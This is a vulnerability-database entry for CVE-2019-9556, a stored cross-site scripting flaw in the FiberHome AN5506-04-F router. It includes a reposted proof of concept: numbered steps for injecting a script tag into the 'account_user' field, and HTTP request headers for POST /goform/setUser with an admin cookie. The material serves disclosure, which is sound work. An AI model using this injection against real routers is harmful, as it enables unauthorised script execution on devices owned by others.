FiberHome Fiberhome AN5506-04-F 跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1518521 漏洞类型 跨站脚本
发布时间 2019-03-05 更新时间 2020-01-17
CVE编号 CVE-2019-9556 CNNVD-ID CNNVD-201903-056
漏洞平台 N/A CVSS评分 N/A
FiberHome AN5506-04-F是中国烽火(FiberHome)公司的一款路由器。 FiberHome AN5506-04-F RP2669版本中存在跨站脚本漏洞,该漏洞源于程序没有正确地过滤用户的输入。远程攻击者可利用该漏洞以Web应用程序权限运行恶意的数据。
# Exploit Title: Fiberhome AN5506-04-F  - Stored Cross Site Scripting
# Date: 04.03.2019
# Exploit Author: Tauco
# Vendor Homepage:
# Version:  RP2669
# Tested on: Windows 10
# CVE :  CVE-2019-9556


Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the useras browser under the privileges of the web application.

Proof of concept : 

1. Login with credential
2. Go to Management
3. Open User Account
4. Add user
5. Inject the post parameter "account_user"
6. Encode Url <script>alert("XSS")</script>

POST /goform/setUser HTTP/1.1
Content-Length: 101
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: loginName=admin
Connection: close